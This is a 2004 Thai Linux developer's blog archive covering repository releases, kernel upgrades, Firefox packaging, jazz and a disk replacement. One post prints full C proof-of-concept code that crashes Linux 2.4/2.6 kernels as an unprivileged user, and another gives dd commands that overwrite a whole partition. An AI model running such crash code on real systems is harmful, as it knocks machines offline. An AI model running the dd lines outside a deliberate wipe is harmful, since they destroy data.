All posts by kitty

Opkts = 875285 !

เปิด Kitty Extras หนึ่งวัน FTP ที่เคยเหงาๆ ก็พุ่งพรวดไปเกือบๆ 800 accesses ในวันเดียว.. แพ็กเก็ตขาออก (Opkts) ช่วงห้าวันที่ผ่านมาตกวันละแสนนิดๆ แต่วันนี้วันเดียวแปดแสนกว่าเกือบๆ เก้าแสน :D .. โอ้ นะ .. เห็นตัวเลขแล้วก็ดีใจ (แต่กะว่าพรุ่งนี้ Opkts ลดลงแน่นอน คอยดูดิ .. ลอล) เพราะอยากให้เอา Extras ไปใช้งานกันเยอะๆ แล้วก็อย่าลืมฟีดแบ็คกลับมาด้วย ผมเองก็รู้ว่าที่ให้โหลดไปนั้นมันมีบั๊กอยู่เยอะแยะไปหมด มีคนช่วยเอาไปใช้ก็จะได้ปรับปรุงให้มันดีขึ้นไปเรื่อยๆ ครับ ..

.. อ่อ แนะนำว่าไม่ต้องโหลดแหลกดูดเอาไปเก็บทุกแพ็กเกจหรอกนะครับ (เห็นนะๆ) เดี๋ยวพรุ่งนี้ เมื่อรืนนี้ผมก็อัปเดตอีก แพ็กเกจที่โหลดไปถ้าเอาไปเก็บไว้เฉยๆ ไม่ได้เอามาใช้งานก็จะกลายเป็นเสียเวลาโหลดไปเปล่าๆ และยังไปเบียดแบนด์วิดธ์ผู้ใช้คนอื่นๆ อีก .. ใช้ apt-get ติดตั้งเท่าที่อยากใช้ดีกว่านะครับ ผมจะได้สบายใจว่าไม่ได้ใช้แบนด์วิดธ์ที่มีผู้ให้ความอนุเคราะห์มาฟรีๆ อย่างฟุ่มเฟือยเกินจำเป็น ถึงจะเป็นแบนด์วิดธ์ขาออกก็ต้องเกรงใจเจ้าของเขาเหมือนกันล่ะครับ และเพราะเหตุนี้ ผมถึงไม่อยากให้ตัวเลขการใช้สูงมากเกินไป .. ถ้าสูงก็ควรจะสูงอย่างคุ้มค่า สมเหตุสมผล ไม่ใช่สูงเพราะใช้ฟุ่มเฟีอย

วันนี้นั่งเตรียมพรีเซนต์งาน Linux Expo 2004 ทั้งวัน ยังได้ไม่ถึงครึ่่งเลยแฮะ มัวแต่นั่งอ่านบทความที่ค้นๆ เจอมาเป็นข้อมูลอ้างอิง พอเข้าใจแล้วว่าทำไมไมโครซอฟต์ถึงได้กลัวลินุกซ์นักหนา ขนาดออกแคมเปญ TCO ของวินโดว์สต่ำกว่ามาชวนเชื่อ จนเป็นชนวนชวนคนหมั่นไส้ .. ว่าไปแล้ว TCO นี่เป็นเรื่องที่ชี้ชัดยากจะตาย จะจัดให้มันดิ้นเข้าข้างใครก็ได้ ไมโครซอฟต์เอาผลสำรวจที่จ้างบริษัททำมาเป็นตัวชี้ มันก็ไม่ยากที่จะสำรวจให้มันได้ผลอย่างที่ต้องการ อีกด้านนึงผลสำรวจวิจัยอิสระมีรายงานเผยแพร่เป็นร้อยหน้าสรุปออกมาว่าลินุกซ์มี TCO ต่ำกว่าวินโดว์ส 40% ผลของอีกสำนักสรุปออกมาคล้ายๆ กันว่า ลินุกซ์มี TCO ต่ำกว่าในช่วง 10 – 40% … สรุปแล้วก็ it depends แหละครับ แล้วแต่ว่าจะวัดอะไรบ้าง ครอบคลุมแค่ไหน ระยะเวลาที่จะพิจารณานานเท่าไหร่ ซึ่งแต่ละองค์กรแต่ละพื้นที่มันก็ไม่เหมือนกัน .. แต่ที่ขัดใจที่สุดคือ TCO – Total Cost of Ownership ที่ไมโครซอฟต์อ้างว่าระบบวินโดว์สต่ำกว่าเนี่ย ผู้ใช้อย่างเราๆ ท่านๆ มี ‘ownership’ ในตัววินโดว์สจริงๆ เหรอฟะ ?

ใช่ว่าทั้งวันจะเจอแต่เรื่องปวดหัว เรื่องเบาๆ ชวนขำก็มี เช่น เรื่องไอบีเอ็มกับเอชพีโม้เรื่องยอดขายคอมพิวเตอร์ติดตั้งลินุกซ์ ปีที่ผ่านมาไอบีเอ็มขายได้ราวๆ หมื่นห้าพันเครื่อง เอ็ชพีได้ฟังก็เกทับว่าประมาณว่า “ถ้านับต่อเครื่องไอบีเอ็มก็ขายได้มากที่สุดแหละ แต่ถ้านับเป็นเปอร์เซ็นของเอชพีเยอะกว่าไอบีเอ็มเว้ย”.. อ่านแล้วก็ฮาดี ไม่คิดว่าจะมีวันที่เซลล์เอ็นจิเนียร์ของบริษัทยักษ์ใหญ่จะมาคุยถล่มกันเรื่องยอดขายลินุกซ์ ….ลอล

เมื่อเช้านึกว่าหายไข้แล้ว ปรากฏว่าตกดึกมาเริ่มมีอาการไข้ขึ้นอีก กินยาลดไข้ไปสองเม็ด ก่อนนอนอัดอีกสองเม็ด ถ้าไม่หายก็ไม่กินมันแล้ว

Kitty Extras Repository :)

กั๊กไว้หลายเดือน วันนี้ได้ฤกษ์รีลีส Kitty Extras Repository ตัวเต็มๆ แล้ว พร้อมกับทำห้องเก็บของใหม่ด้วย (ดูแล้วอาจจะไม่ต่างจากเดิมเท่าไหร่ แต่อันนี้ใหม่แล้วนะ ค้นหาแพ็กเกจได้ด้วย)

มีอะไรน่าสนใจบ้าง ? สำรวจกันเอาเองละกันครับ :P .. Kitty Extras มีไบนารี (x86.rpm) สามร้อยกว่าแพ็กเกจ เจ็ดร้อยกว่าเมกะไบต์ (ไม่รวมซอร์ส) ช่วงนี้อาจจะ browse ยากสักหน่อย ทนใช้แบบนี้ไปก่อน ไว้จะทำเพจสำหรับ browse ง่ายๆ อีกทีในเร็ววันนี้ครับ ..

แพ็กเกจใน Kitty Extras มีตั้งแต่ใหม่เอี่ยม build วันที่ 20-21 มิถุนายน 2004 จนถึงเก่าโคตรๆ ตั้งแต่ปีที่แล้ว ที่เก่าสุดๆ จำได้ว่า build บน TLE 5.5 alpha/beta ยังอุ่นใจได้ว่าใช้งานกับทะเลรุ่น 5.5 ได้ค่อนข้างแน่นอน ส่วนตัวใหม่ๆ รุ่นหลังๆ หลายตัว build บน TLE 5.5 lite และบางตัวจะ build กับ GNOME 2.6 .. อ่อ TLE 5.5 สั่ง apt-get update / upgrade / install ได้เลยครับ เพราะ 5.5 pre-configured apt ไว้ให้ใช้กับ Kitty Extras ตั้งแต่แรกแล้ว :)

แพ็กเกจเกือบทั้งหมดนี้ผมใช้ buildarch เป็น i386 (ยกเว้นไม่กี่ตัวที่ใช้ i486 และ i686) ทดสอบติดตั้งและเรียกใช้งานบนเครื่อง Pentium III กับ Athlon XP .. แต่ YMMV ครับ .. ผมไม่สามารถการันตีได้ว่าแพ็กเกจเหล่านี้จะใช้งานกับฮาร์ดแวร์ได้ทุกเครื่อง และเช่นเดียวกับ FOSS ทั่วไปครับ แพ็กเกจทั้งหมด provided ‘AS IS’ และ ‘WITHOUT ANY WARRANTY’ นะครับ ใช้แล้วเครื่องเจ๊ง ข้อมูลหาย แม่ยายด่า อาป๊าโวย ฯลฯ มาโทษกันไม่ได้นะ (ที่จริงซอฟต์แวร์แพงๆ ก็เขียนสัญญาอนุญาตไว้ทำนองนี้เหมือนกันแหละ) .. หากมีปัญหาในการใช้งานส่งเมลมาก็ได้ หรือจะ irc.freenode.net ห้อง #tlwg ก็ได้ครับ

วันนี้ไม่ค่อยสบาย ตื่นมาก็รู้สึกว่าไข้ขึ้น .. เอ.. หรือว่าเป็นเพราะฟัง ออร์เน็ต โคลแมน หว่า .. ฟรีแจ๊สพี่แกฟังได้ไม่เกิน 3 เพลงก็ต้องปิดพักสมอง …..ลอล

อ่าวไทยในบริบทของการพัฒนาลินุกซ์ทะเล

วันนี้ MrChoke แจ้งมาว่า อัปโหลดอ่าวไทยขึ้นเซิร์ฟเวอร์แล้ว มี X.org และ GNOME แล้ว .. ขาดเคอร์เนล .. ส่วน KDE ตัวใหม่เห็นว่าได้มาแล้ว แต่ยังไม่เริ่มทำเข้าอ่าวไทย …

เผื่อใครผ่านมาแถวนี้แล้วยังไม่รู้จัก อ่าวไทย (Aow Thai) เป็น unstable / testing branch ของ TLE .. เทียบได้กับ Rawhide ของ Red Hat หรือ Sid / Sarge ของ Debian .. อ่าวไทยนี้จะใช้สำหรับ unstable / testing ไปตลอด ไม่มีการเปลี่ยน ไม่มีการกำหนดเลขเวอร์ชันกำกับ ..ชื่อ “อ่าวไทย” ไม่ได้ตั้งกันลอยๆ หากแต่มีที่มาจากการพัฒนา TLE นี่เอง .. การพัฒนาดิสโตรเป็นการรวมรวมซอฟต์แวร์มาประกอบกันเป็นระบบที่ใช้งานได้ .. ดิสโตรแทบทุกตัวมีจุดเริ่มต้นเหมือนกัน คือจากโครงการซอฟต์แวร์โอเพ่นซอร์สต่างๆ ไม่ว่าจะเป็น Kernel XFree86 X.org GNOME KDE .. ร่ายยาวมาจนถึงแอพพลิเคชัน อย่าง Mozilla Evolution Gaim ฯลฯ .. ในทีมพัฒนาจึงมีคำเรียกโครงการเหล่านี้ว่าเป็น “ต้นน้ำ” ซึ่งเป็นแหล่งกำเนิดสายน้ำน้อยใหญ่หลายร้อยสาย บ้างก็ไหลมารวมกัน (merge / require / depend) หรือบางครั้งก็ไหลแยก (fork) ออกจากกัน .. แต่ท้ายที่สุดน้ำทุกสายก็ไหลมารวมกันที่ “อ่าวไทย” และไหลออกสู่ “ทะเล” ต่อไป :)

อืมม .. เสาร์อาทิตย์นี้วางแผนจะทำงานอะไรบางอย่างแล้ว .. ไว้สัปดาห์หน้าคงได้เริ่ม rebuild unstable บนอ่าวไทยกัน :)

นอกเรื่อง .. ได้เพลงของธีโลเนียส มองค์ (Thelonious Monk) มาฟังสามอัลบั้ม ..เช่นเคย มองค์มักเลือกโน้ตที่แปลกๆ เหมือนไม่เข้ากับคอร์ด เสียงเปียโนของมองค์จึงมีสำเนียงแปร่งๆ จังหวะมักคร่อมเหมือนจะหลุดแต่ไม่หลุด .. โดยส่วนตัว ชอบ .. แต่ไม่ถูกใจเท่าบิลล์ อีแวนส์ .. อ่อ ได้เพลงของ ออร์เน็ต โคลแมน (Ornette Coleman) มาฟังด้วย .. ปวดหัวแน่ๆ .. พรุ่งนี้จะเล่าอาการให้ฟัง .. ลอล

Kernel Upgrade Event

สองวันที่ผ่านมา วุ่นๆ กับงานติดตั้งเซิร์ฟเวอร์สองตัว ทั้งคู่ใช้ FreeBSD 4.10 .. ระหว่างรอติดตั้งซอฟต์แวร์ผ่าน ports collection ก็เลยถือโอกาสสั่ง cvsup sys บนเบลดันดีแล้วก็อัปเกรดเป็น 4.10 ไปด้วยเลย

%uname -a
FreeBSD belldandy.kitty.in.th 4.10-STABLE FreeBSD 4.10-STABLE #1: Tue Jun 15 18:3
9:32 ICT 2004     root@belldandy.kitty.in.th:/usr/src/sys/compile/kitty  i386

กลับมาจากติดตั้งเซิร์ฟเวอร์ถึงห้องก็เที่ยง ซักผ้า รีดผ้า ออกมาทำงานก็บ่ายกว่าๆ แล้ว .. นั่งหาวิธี build firefox อยู่พักนึง เหมือนจะคอมไพล์ได้แล้วโดยแฮ็กเอาถึกๆ (i.e., ส่วนไหนคอมไพล์ไม่ผ่าน ตัดออกสถานเดียว) ไว้จะทำแพตช์แล้วก็ทำแพ็กเกจอีกที .. repo มีอัปเดตอื่นๆ อีกเล็กน้อย qcad 2.0.3.3, k3b 0.11.11, gnome-ppp 0.3.2 และมีคิวรออัปเดตอยู่อีกราวๆ 4-5 ตัว

อ่อ เคอร์เนล 2.6.7 ของลินุกซ์ออกแล้ว เลยได้อัปเดตเคอร์เนลของ peorth พร้อมกับทำแพตช์ IRQ Routing ของ Acer TM360 ไปด้วยเลย (ที่ผ่านมา แพตช์มือตลอด ใช้เวลาเยอะ ไม่ไหว) ตอนนี้ก็รัน 2.6.7 เป็นที่เรียบร้อยแล้ว

[kitt@peorth kitt]$ uname -a
Linux peorth.kitty.in.th 2.6.7-acer-tm360 #1 Thu Jun 17 16:18:07 ICT 2004 i686 i
686 i386 GNU/Linux

.. เป็นไปตามคาด คือแก้บั๊ก local DoS แล้ว .. ใน LKML ไม่ค่อยฮือฮามากอย่างที่คิดไว้ บั๊กที่ว่าอยู่ในโค้ดส่วนของ FPU ดูจากแพตช์ที่แก้บั๊ก (ใน 2.4.x) แล้วแก้กันง่ายๆ แค่บรรทัดเดียวเอง สงสัยเป็นแมลงกิ๊กก๊อก หรือไม่ก็อาจจะรู้กันมาก่อนจะเป็นข่าวนานแล้วก็ได้ .. ล่าสุด แว่วๆ มาว่าเจอบั๊กอีกตัวแล้ว แต่ก็แว่วๆ มาจากมาร์เซลโล (Marcello Tosatti – 2.4 kernel maintainer) อีกว่าบั๊กใหม่นี้แก้แล้วใน -mm .. ไวกันจริงๆ

วันนี้บ้าน ($HOME) ใน yggdrasil เต็ม .. เลยนั่งทำความสะอาด เผาแผ่นไปหลาย บ้านสะอาดขึ้นเยอะ กว้างขวางขั้นมาทันตา .. ยังเหลือไฟล์รกๆ อยู่อีกนิดหน่อย ดูๆ แล้วคงต้องจัดให้เป็นระเบียบไม่ช้าก็เร็ว

นอนไม่เต็มอิ่มมาหลายคืนแล้ว .. ไม่เกี่ยวกับบอลยูโรนะครับ เพราะยังไงผมไม่มีทีวีดู .. อ่อ ที่ AIT มีถ่ายทอดบอลผ่าน campus network ด้วยนะ (นอกจากบอลแล้วทั่วไปจะมีข่าว กีฬา และวิทยุตลอดทั้งวันอยู่แล้ว .. วันที่ 1/16 อาจจะมีถ่ายทอดหวยให้ดูด้วย – -‘) .. ภาพ/เสียงคมชัด แต่ดันเป็น Windows Media แถมยังสตรีมออกมาเป็นมัลติคาสต์ (multicast) ซึ่งยังดูบนลินุกซ์ไม่ได้ .. ที่จริงนะ ผมลงทุนเขียนโปรแกรมรับสตรีมได้แล้ว dump ข้อมูลออกมาได้แล้ว แต่มันเอามาเพลย์แบ็คตรงๆ ไม่ได้ เข้าใจว่าต้องถอดมัลติคาสต์สตรีมของ Windows Media ให้ได้เป็นสตรีม avi ก่อน ถึงจะเพลย์แบ็คได้ คิดจะ reverse engineer มันก็ไม่ไหวเพราะขาดทั้งข้อมูล ปัญญา และเวลา .. โง่นิ kitty

I know what you chatted last week

.. ก็เพราะ ..

[kitt@peorth kitt]$ uptime
19:07:23 up 7 day, 23:28, 6 users, load average: 0.06, 0.13, 0.07

uptime ล่าสุดของ peorth เกือบๆ แปดวัน แม้จะไม่ใช่ uptime ที่มากที่สุดที่เคยมี (peorth สูงสุด 14 วัน บนลินุกซ์ 7 วันบน Win2K .. uptime สูงสุดที่เคยทำได้คือสองร้อยกว่าวันบน FreeBSD ก่อนจะ reboot เพื่ออัปเกรดเคอร์เนล) … อ่อ และตลอดเวลาที่ up ผมออนไลน์ และเป็นสัปเหร่อเฝ้า (ป่าช้า) #tlwg แทบไม่ได้ปิดหน้าต่าง irc เลย .. ข้อความที่คุยกันผม log ไว้หมดแล้วล่ะท่านประธานที่เคารพ :P

ฟิตจัด ..ทำงานไป ฟังเพลงไป อัปเดตแพ็กเกจไปซะเยอะ

  • libsigc++ 2.0.3
  • glibmm 2.4.2
  • gtkmm 2.4.2
  • libglademm 2.4.1
  • libgnomeprintuimm 2.5.1
  • xvidcore 1.0.1
  • libcaca 0.9
  • xine-lib 1.0.0 rc4a
  • totem 0.99.12
  • scribus 1.1.7
  • littlecms 1.13
  • raptor 1.3.1
  • lbreakout 2.5 beta6
  • povray 3.6
  • gnusound 0.6.2
  • gl-117 1.3
  • fox 1.2.3
  • drgeo 0.9.13
  • mjpegtools 1.6.2
  • transcode 0.6.12 (rebuild)

ฯลฯ

base ของทะเล MrChoke บอกว่าเริ่ม build GNOME แล้ว .. และคาดว่าจะใช้งาน gcc 3.4 เป็นหลักในขณะที่ 3.3 เป็น compat คู่กับ 2.96 … โฮ่ๆๆ

ข่าวใหญ่เรื่อง local DoS attack linux โดยโค้ดสั้นๆ ง่ายๆ เพียงแค่

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
  char fpubuf[108];
  __asm__ __volatile__ ("fsave %0n" : : "m"(fpubuf));
  write(2, "*", 1);
  __asm__ __volatile__ ("frstor %0n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
  struct itimerval spec;
  signal(SIGALRM, Handler);
  spec.it_interval.tv_sec=0;
  spec.it_interval.tv_usec=100;
  spec.it_value.tv_sec=0;
  spec.it_value.tv_usec=100;
  setitimer(ITIMER_REAL, &spec, NULL);
  while(1)
  write(1, ".", 1);

  return 0;
}

.. ก็มีโอกาสทำให้เคอร์เนล 2.4.x / 2.6.x แครชได้เกือบทุกรุ่น แม้เป็นแค่ user ธรรมดาๆ …. สนใจก็ไปลองกันเอง ตอนนี้เป็นที่รู้กันแล้วทั้ง LKML และคงแก้บั๊กนี้ก่อนจะออก stable ถัดไป

ย้ายมาตั้งฐานอยู่ต่างจังหวัดชั่วคราว เตรียม merge extras กับ extras-2 :)

บิลล์ อีแวนส์

ยังไม่หายมันส์จากแจ๊ส .. สองสามวันที่ผ่านมานั่งฟังเพลงของบิลล์ อีแวนส์เกือบตลอดทั้งวัน เลยขอเขียนตอนสั้นๆ ให้กับบิลล์ อีแวนส์ซักนิด

ในวงการแจ๊ส มีชื่อบิลล์ อีแวนส์ (Bill Evans) ปรากฎอยู่สองช่วงคือ ราวทศวรรษ 1950 และ 1980 โดยทั้งสองครั้งที่ปรากฎนี้เป็นคนละคนกัน บิลล์ อีแวนส์คนแรกนั้นเป็นนักเปียโนฝีมือดี เจ้าของวงทรีโอที่โด่งดังมากและเป็นผู้วางรากฐานของแจ๊สจากอัลบั้ม Portrait in Jazz ซึ่งมีอิทธิพลต่อนักดนตรีแจ๊สรุ่นหลังจนถึงทุกวันนี้ อีแวนส์เคยร่วมงานกับไมล์ส เดวิส ช่วงสั้นๆ แต่เพราะไม่ชอบการเดินสายเล่นดนตรี ประกอบกับต้องการทำงานในแนวของตัวเอง จึงขอออกจากวงของไมล์ส ..ไมล์สต้องขอร้องให้อีแวนส์ร่วมงานต่อ อีแวนส์ก็ยินยอมในช่วงแรก และออกจากวงของไมล์สในที่สุด อย่างไรก็ตามอีแวนส์ก็กลับมาร่วมงานกับไมล์สอีกครั้งตอนที่อัดอัลบั้ม Kind of Blues การอัดครั้งนั้นถือว่าเป็นวงที่สมบูรณ์ที่สุดครั้งหนึ่งของไมล์ส และอัดกันเพียงเทคเดียวผ่าน และอัลบั้มนี้ก็เป็นสัญลักษณ์ของโมดัลแจ๊ส (Modal Jazz) ในเวลาต่อมา

เสียงเปียโนของอีแวนส์นั้น หากเทียบกับศิลปะแล้วว่ากันว่าเทียบได้กับแนวอิมเพรสชันนิสม์ (Impressionism) ดังเช่น งานของ แวน โก๊ะห์ (Van Gogh) คือถ่ายทอดความพึงพอใจของตัวเองออกมาในงาน แทนที่จะถ่ายทอดอย่างตรงไปตรงมาอย่างการวาดภาพเหมือน อีแวนส์นั้นก็เช่นเดียวกัน เขาเป็นนักเปียโนที่ช่ำชองเทคนิค แต่ไม่ใช้พร่ำเพรื่อ มักคิดหาเส้นเสียงแต่แปลกต่างออกไปเสมอ แม้จะเล่นเพลงมาตรฐานธรรมดาก็จะมีสำเนียงไม่ซ้ำเดิม เขายังพัฒนาให้มือซ้ายและขวาเล่นอิสระต่อกัน โดยให้มีปฏิสัมพันธ์แทนการบังคับมือตายตัวเหมือนที่เคยเล่นกันมา ทำให้เกิดคอร์ดใหม่ๆ ขึ้นมากมาย และมีบ่อยครั้งที่อีแวนส์เล่นคอร์ดไม่มีราก โดยปล่อยให้เบสเป็นตัวกำหนดรากของคอร์ดเอง

ผมโชคดีที่ได้งานของบิลล์ อีแวนส์ ที่อัดกับสังกัดเวิร์ฟ (Verve Records) มาหลายแผ่น เวิร์ฟออกชุดบ็อกเซ็ตของบิลล์ อีแวนส์ในชื่อ The Complete Bill Evans on Verve ซึี่งรวมงานที่อิีแวนส์อัดที่สังกัดนี้ รวม 18 แผ่น สองร้อยกว่าเพลง เพลงละหลายๆ เทค ฟังแล้วก็ไม่แปลกใจเลยว่าทำไมเขาถึงได้ชื่อว่าเป็น นักเปียโนแนวอิมเพรสชันนิสม์ :)

บิลล์ อีแวนส์อีกคน เป็นนักแซ็กโซโฟนเสียงเทเนอร์/โซปราโนมือดี และเป็นนักแต่งเพลงที่มีพรสวรรค์ ในช่วง 1980 อีแวนส์คนนี้เข้าร่วมวงของไมล์ส เดวิสยุคคืนสู่เหย้า โดยไมล์สเป็นคนโทรศัพท์ตามหาอีแวนส์ด้วยตัวเอง อีแวนส์ร่วมงานกับไมล์สราวๆ 3 ปี ก่อนจะออกไปร่วมวงมหาวิษณุออร์เคสตราของจอห์น แมคลาฟลิน .. ผมยังไม่มีโอกาสได้ฟังงานของอีแวนส์คนหลังนี้ แต่หากมีชื่อไมล์สเป็นเครดิตฝีมือคงไม่ธรรมดาแน่

พูดถึงสองบิลล์ อีแวนส์ ก็ทำให้นึกถึงสอง จอห์น วิลเลียมส์ (John Williams) ซึ่งมีชื่อเสียงในวงการดนตรี และยังอยู่ในยุคเดียวกันอีกต่ะหาก.. หนึ่งเป็นนักกีต้าร์คลาสสิคที่ได้รับการยกย่องว่าเป็นมือหนึ่งของโลกต่อจาก อังเดร เซโกเวีย (ซึ่งเป็นอาจารย์ของเขาเอง) .. ส่วนอีกหนึ่งเป็นนักประพันธ์เพลง ซึ่งแต่งเพลงประกอบภาพยนตร์ดังๆ จำนวนมาก ตั้งแต่ยุค สตาร์ วอร์ส จอว์ส อินเดียนาโจนส์ จูแรสสิคพาร์ค ยาวมาจนถึง เอ.ไอ. และ แฮรี พอตเตอร์

อารมณ์สุนทรีย์เสียจริง .. ทำงานต่อดีกว่า :)

จิ้งจอกไฟ

คืนวานเปรยๆ ในห้อง #tlwg ว่าทำ Mozilla Firefox บนทะเลด้วยดีหรือเปล่า ? .. หลายๆ คนดูจะชอบเจ้าจิ้งจอกไฟ มินิโปรเจ็คจิ้งจอกไฟเลยเริ่มขึ้นตั้งแต่คืนก่อน จะบอกว่าง่ายก็ไม่ง่าย จะว่ายากก็ไม่ยาก แต่เป็นเพราะใช้เวลาคอมไพล์นานมากๆ รอบนึงๆ ใช้เวลาร่วมชั่วโมงครึ่ง ทดสอบ + hack + customize นั่งคอมไพล์ไปประมาณ 7-8 รอบกว่าจะได้ rpm ที่พร้อมติดตั้งโดยไม่ก่อปัญหาชนกับ Mozilla .. เดี๋ยวตอน base ออกก็อาจจะต้อง rebuild อีกรอบ เฮอะๆๆ

หลังจากลองทดสอบดู การทำงานเร็วขึ้นพอสมควรเมื่อเทียบกับ Mozilla ของทะเล ส่วนหนึ่งคงเป็นเพราะไม่ได้ใช้ ICU ในการตัดคำ ..ที่แปลกอีกอย่างคือใช้ฟอนต์ Microsoft Sans Serif ไม่ได้เลย ไม่ว่าจะตั้งใน Preferences หรือระบุในไฟล์ css Firefox จะแครชไปเลย แต่สำหรับผู้ใช้งานลินุกซ์เรื่องนี้คงไม่เป็นปัญหามั๊ง ^-^

My new HDD

ฮาร์ดดิสก์ Seagate 60 GB ของผมมี bad block นานแล้วแต่ไม่ได้เอาไปเคลมซักทีเพราะไม่มั่นใจว่าข้อมูลสำคัญๆ ย้ายออกมาครบแล้วหรือยัง เลยเสียบเป็น /dev/hdb ค้างไว้สองเดือน .. ถึงวันนี้แทบไม่ได้เรียกใช้งาน /dev/hdb อีกเลย ก็เลยคิดว่าเอาไปเคลมดีกว่า ..

ก่อนอื่นต้องล้างข้อมูลให้เกลี้ยงซะก่อนเพราะมีข้อมูลสำคัญหลายอย่าง (เช่น username/password ทั้งหมดที่ถืออยู่กว่าร้อยตัว – -‘) ลองหาพวก destructive delete/remove file ดู แล้วก็พบว่ามีโปรแกรม shred อยู่ในชุด coreutils สำหรับทำลายข้อมูลด้วยวิธีเขียนทับหลายๆ รอบ (default 25 รอบ) ป้องกันไม่ให้กู้ข้อมูลกลับมาได้อีกแม้จะมีฮาร์ดแวร์ราคาแพงสำหรับที่ตรวจพื้นผิวดิสก์ได้ก็ตาม โปรแกรมนี้ทำงานช้ามาก (floppy disk 1 แผ่นใช้เวลา 20 นาที) จะลบฮาร์ดดิสก์ทั้งลูกก็ดูจะเว่อร์ไป เลยใช้วิธีง่ายๆ คือ fill zero ทั้งพาร์ติชันแทน โดย

# dd bs=1024k if=/dev/zero of=/dev/hdb1

หรือจะให้ดีกว่านั้น (แต่ช้ากว่า) คือ fill random ด้วยคำสั่ง

# dd bs=1024k if=/dev/urandom of=/dev/hdb1

ล้างดิสก์แล้วก็พร้อมเอาไปเคลม ดิสก์ตัวนี้ประกันของซินเน็กซ์ สาขาใกล้สุดคือที่เซียร์รังสิต แต่ซินเน็กซ์สาขาเซียร์รังสิตไม่มี 60 GB ก็เลยอัปเกรดเป็น 80 GB แทน เพิ่มตังค์ 300 บาท + VAT 7% ครึ่งชั่วโมงมารับ ระหว่างรอก็เดินดูแผ่น สอยดีวีดีคอนเสิร์ตมาสามแผ่น .. ไปรับฮาร์ดดิสก์ที่ซินเน็กซ์ ขากลับผ่านแผงดีวีดีเลยซื้อแผ่นคอนเสิร์ตกับหนังมาอีกสามแผ่น .. ลอลลล

กลับมาก็เอาฮาร์ดดิสก์ตัวใหม่มาต่อ detect ได้ถูกต้องไม่มีปัญหา ลินุกซ์มองเห็น /dev/hdb รายงานว่าไม่พบพาร์ติชัน ถือว่าปกติเพราะคงเป็นดิสก์เปล่าๆ .. บูตเสร็จก็มาแบ่งพาร์ติชัน ปรากฏว่าอ่าน /dev/hdb ไม่ได้เพราะเซ็กเตอร์ 0 เจ๊ง .. ฮ่วย (- -)a

วันนี้เลยไปเคลมอีกรอบ ตัวล่าสุดนี้ดูเรียบร้อยดี อยากลอง jfs บ้าง ก็เลยฟอร์แมตเป็น jfs ทั้งหมดเลย .. เรียบร้อยแล้วลอง mount ดูปรากฏว่าเคอร์เนลไม่สนับสนุน (ลืมไปว่าไม่ได้คอนฟิกไว้) เลยถือโอกาสอัปเกรดเคอร์เนลเครื่อง Yggdrasil ไปด้วย

[kitt@yggdrasil kitt] $ uname -a
Linux yggdrasil.kitty.in.th 2.6.6-mm5 #1
Thu Jun 10 14:44:30 ICT 2004 i686 athlon i386 GNU/Linux

ความคืบหน้าของทะเล .. MrChoke ปั่น base สำหรับทะเลใกล้เสร็จแล้ว แพ็กเกจ base ทั้งหมดมาจากโครงการ TLC และตั้งชื่อไฟล์แพ็กเกจด้วย “.tlc” ไว้เลย เป็นการบอกที่มา เพื่อให้สะดวกในการจัดการและบริหารแพ็กเกจในภายหลัง

2-3 วันที่ผ่านมาใช้โทรศัพท์มือถือบ่อยมาก มีอาการปวดหัว คลื่นไส้ แสบตา .. ไม่ดีเลย :(

Venus Transit

ตกนรกมาตั้งแต่เมื่อวาน นั่งปั่นต้นฉบับอยู่ วีน๊ง วีนัส ไม่ดูมันแล้ว .. วันก่อนพี่เทพก็ถามๆ ว่า มข. ดูที่ไหนได้บ้าง เลยแนะนำให้ไปตึกหลอด คณะวิทยาศาสตร์ .. แต่ดูเหมือน พี่เทพก็อดดูเหมือนกัน

พลาดคราวนี้ยังมีโอกาสอีกครั้งแปดปีข้างหน้า .. หรือไม่ก็เอาอย่างผมก็ได้ เปิด Celestia ดูเอา ลอล

Anyway, เอาภาพจาก Celestia มาฝากสามภาพ เวลาอาจจะผิดเพี้ยนนิดหน่อยนะครับ เพราะกำหนดมุมมองจากโลกไม่เป็น (- -‘)

Venus transit simulated in Celestia:

ปั่นงานต่อล่ะ .. (T_T)

นรกมีจริง ..

วันนี้นั่งเขียนเรื่องแจ๊สอย่างเดียวเลย ผมเขียนเสร็จแล้วนะ อ่านได้ที่ Jazz up your life  ครับ..

สายๆ มาเข้าห้อง #tlwg MrChoke บอกว่าพยายามจะออก base ภายในวันนี้ งานเร่งมากขนาดบ่นว่า นรกมีจริง

จากนั้นไม่นาน ผมก็ได้รับเมลจากผู้จัด Linux Expo 2004 บอกว่าอยากได้ต้นฉบับที่จะนำเสนอ ..ภายในวันพุธนี้ .. นรกมีจริงๆ ด้วย (T_T)